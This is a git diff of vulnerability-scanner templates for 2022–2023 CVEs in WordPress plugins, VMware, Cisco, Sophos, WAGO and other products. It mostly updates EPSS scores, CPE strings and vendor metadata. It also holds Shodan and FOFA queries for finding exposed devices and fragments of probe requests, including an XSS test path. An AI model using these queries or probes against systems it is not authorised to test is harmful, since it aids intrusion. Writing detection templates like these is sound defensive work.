a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48165 cwe-id: CWE-284 - epss-score: 0.08683 + epss-score: 0.04725 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* + epss-percentile: 0.91602 metadata: max-request: 1 shodan-query: http.favicon.hash:-1350437236 diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 621b2d3720..e7dff63c1b 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00261 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.63049 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 3db1f4d7b5..f44059ffd3 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index b82ee1eeae..58f98dd937 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.02342 + epss-score: 0.03359 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* + epss-percentile: 0.90145 metadata: max-request: 1 shodan-query: title:"Appliance Management Console Login" diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 24ce6496d0..524b343c1d 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 2b7bbe87e7..307a05371d 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 - epss-score: 0.00697 + epss-score: 0.01065 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.8235 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 84dce1297f..fdfcee5b18 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0297 cwe-id: CWE-94 - epss-score: 0.35759 + epss-score: 0.32256 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* + epss-percentile: 0.96441 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 029d675d3f..6d32978356 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -6,16 +6,25 @@ info: severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. - remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 - https://nvd.nist.gov/vuln/detail/CVE-2023-0448 + remediation: Fixed in version 4.3 and above classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2023-0448 + cwe-id: CWE-79 + epss-score: 0.00064 + cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 1 verified: true publicwww-query: "/wp-content/plugins/wp-helper-lite" + framework: wordpress + vendor: matbao + product: wp_helper_premium tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite http: diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 9286a34dc0..6811957124 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29093 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 63055a8114..9dc604d39e 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 - epss-score: 0.00582 + epss-score: 0.00779 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.79143 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index 67d3ae5981..e29f4a3f1e 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.0007 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.28777 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 58a840d532..9490023057 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0562 cwe-id: CWE-89 - epss-score: 0.01095 + epss-score: 0.01124 cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82821 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index 68e7165ac9..676a95a9c3 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -15,8 +15,9 @@ info: cvss-score: 4.8 cve-id: CVE-2023-0563 cwe-id: CWE-79 - epss-score: 0.00474 + epss-score: 0.00563 cpe: cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.74832 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 845514a5ee..7bc16a393c 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.03477 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90291 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 8d69afb3f2..04db2bfb26 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 - epss-score: 0.96397 + epss-score: 0.96578 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* + epss-percentile: 0.99443 metadata: max-request: 1 shodan-query: http.favicon.hash:1484947000 diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 7ae22dd029..02d27d3301 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.00264 + epss-score: 0.00374 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.69277 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 0860309ea7..4ea8e9b927 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29093 metadata: max-request: 2 verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 9225a58cde..3023622ffc 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00485 + epss-score: 0.00283 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.64533 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 8ad99ce27f..be84fef3d0 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1020 cwe-id: CWE-89 - epss-score: 0.04513 + epss-score: 0.06484 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92801 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 0359bc81e9..9de25d9e09 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.00485 + epss-score: 0.00283 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.64533 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index f0884ebe98..1f50185e5f 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1177 cwe-id: CWE-29 - epss-score: 0.00859 + epss-score: 0.01497 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + epss-percentile: 0.85238 metadata: max-request: 3 shodan-query: http.title:"mlflow" diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index f4a76a14c0..3a787e038c 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-1021 epss-score: 0.00071 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* + epss-percentile: 0.29038 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 5e059dd716..5e70e362a8 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.03351 cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* + epss-percentile: 0.90132 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 43dd2b0299..19f0264ff5 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.0007 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* + epss-percentile: 0.28688 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index f8135aa886..5b7bc71254 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -6,15 +6,24 @@ info: severity: medium description: | The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. - remediation: Fixed in version 2.124 reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 - https://nvd.nist.gov/vuln/detail/CVE-2023-1546 + remediation: Fixed in version 2.124 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2023-1546 + cwe-id: CWE-79 + epss-score: 0.00071 + cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29093 metadata: max-request: 2 verified: true + framework: wordpress + vendor: plainviewplugins + product: mycryptocheckout tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated http: @@ -25,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"> HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 85e54309f5..1fcfc4ac58 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.2507 + epss-score: 0.31251 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* + epss-percentile: 0.96403 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 966560ba12..ca2c9c7950 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -3,20 +3,26 @@ id: CVE-2023-1698 info: name: WAGO - Remote Command Execution author: xianke - severity: high + severity: critical description: | In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise. reference: - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1698 + - https://cert.vde.com/en/advisories/VDE-2023-007/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 + epss-score: 0.59767 + cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.97319 metadata: max-request: 1 shodan-query: html:"/wbm/" html:"wago" + vendor: wago + product: compact_controller_100_firmware tags: cve,cve2023,wago,rce http: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 271e70a9a8..faf56c185d 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 - epss-score: 0.04513 + epss-score: 0.06484 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92801 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 038e4b783d..db613b42cd 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1835 cwe-id: CWE-79 - epss-score: 0.00079 + epss-score: 0.00071 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29093 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 5d7d6d503f..37a8665942 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1890 cwe-id: CWE-79 - epss-score: 0.00079 + epss-score: 0.00157 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.5154 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index d40edc018f..59182f4869 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20073 cwe-id: CWE-434 + epss-score: 0.55732 cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* - epss-score: 0.0014 + epss-percentile: 0.97213 metadata: fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" max-request: 3 @@ -26,7 +27,6 @@ info: vendor: cisco verified: true tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive - variables: html_comment: "" # Random string as HTML comment to append in response body @@ -71,9 +71,8 @@ http: internal: true dsl: - body_1 - matchers: - type: word part: body_3 words: - - "{{html_comment}}" \ No newline at end of file + - "{{html_comment}}" diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 55746378eb..4972e3da54 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -16,13 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 - epss-score: 0.00079 - cpe: cpe:2.3:a:custom_404_pro_project:custom_404_pro:*:*:*:*:*:wordpress:*:* + epss-score: 0.00171 + cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.535 metadata: max-request: 2 verified: true framework: wordpress - vendor: custom_404_pro_project + vendor: kunalnagar product: custom_404_pro tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 58bbd00f7d..0668b84b1c 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.06575 + epss-score: 0.10253 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* + epss-percentile: 0.94193 metadata: max-request: 2 shodan-query: title:"vRealize Log Insight" diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index e97b791bac..35c75695b4 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -11,13 +11,15 @@ info: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ - https://github.com/sinsinology/CVE-2023-20887 + - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20887 cwe-id: CWE-77 - epss-score: 0.71431 + epss-score: 0.96066 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* + epss-percentile: 0.99263 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 6170f3cc4c..090dc83153 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-502 epss-score: 0.0799 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* + epss-percentile: 0.93437 metadata: verified: true shodan-query: title:"VMware Aria Operations" diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 72dce5703b..55159124e1 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-20889 cwe-id: CWE-77 - epss-score: 0.00609 + epss-score: 0.02153 cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* + epss-percentile: 0.87886 metadata: verified: true shodan-query: title:"VMware Aria Operations" diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index 6691f77695..7f5efdd9b9 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -16,9 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2122 cwe-id: CWE-79 + epss-score: 0.00071 + cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29286 metadata: max-request: 2 verified: "true" + framework: wordpress + vendor: 10web + product: image_optimizer tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated http: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 5c577cf475..be769e69aa 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2130 cwe-id: CWE-89 - epss-score: 0.01206 + epss-score: 0.01557 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.85582 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index c6e7c3148f..e362f0e3bf 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -11,11 +11,20 @@ info: - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip - https://nvd.nist.gov/vuln/detail/CVE-2023-2178 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 cve-id: CVE-2023-2178 + cwe-id: CWE-79 + epss-score: 0.00078 + cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.32486 metadata: max-request: 2 verified: true - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated + framework: wordpress + vendor: aajoda + product: aajoda_testimonials + tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated http: - raw: @@ -25,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 73a5bcfb62..3e56431e69 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -10,16 +10,23 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md - https://nvd.nist.gov/vuln/detail/CVE-2023-22478 - https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4 + - https://github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6 + - https://github.com/KubeOperator/KubePi/releases/tag/v1.6.4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-22478 cwe-id: CWE-862 + epss-score: 0.01048 + cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* + epss-percentile: 0.82159 metadata: max-request: 1 fofa-query: "kubepi" shodan-query: html:"kubepi" verified: true + vendor: fit2cloud + product: kubepi tags: cve,cve2023,kubepi,k8s,exposure http: @@ -31,6 +38,7 @@ http: Content-Type: application/json {} + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 08aceb7382..e25685f1e9 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -10,16 +10,23 @@ info: - https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8 - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1 - https://nvd.nist.gov/vuln/detail/CVE-2023-22480 + - https://github.com/KubeOperator/KubeOperator/commit/7ef42bf1c16900d13e6376f8be5ecdbfdfb44aaf + - https://github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4 classification: - cve-id: CVE-2023-22480 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cwe-id: CWE-863 + cve-id: CVE-2023-22480 + cwe-id: CWE-863,CWE-285 + epss-score: 0.00724 + cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* + epss-percentile: 0.78239 metadata: max-request: 1 verified: true shodan-query: html:"KubeOperator" fofa-query: app="KubeOperator" + vendor: fit2cloud + product: kubeoperator tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure http: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index 6f1a1e1c89..a03b7606f5 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 - epss-score: 0.00597 + epss-score: 0.00876 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* + epss-percentile: 0.80371 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index d46d385ea8..10fe61be34 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -15,9 +15,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2272 cwe-id: CWE-79 + epss-score: 0.00071 + cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29286 metadata: max-request: 2 verified: true + framework: wordpress + vendor: tiempo + product: tiempo tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom http: diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 93332f3777..2b20079304 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 - epss-score: 0.00876 + epss-score: 0.00853 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* + epss-percentile: 0.80108 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 16a784ec3a..8427d597e9 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -11,20 +11,22 @@ info: - https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt - 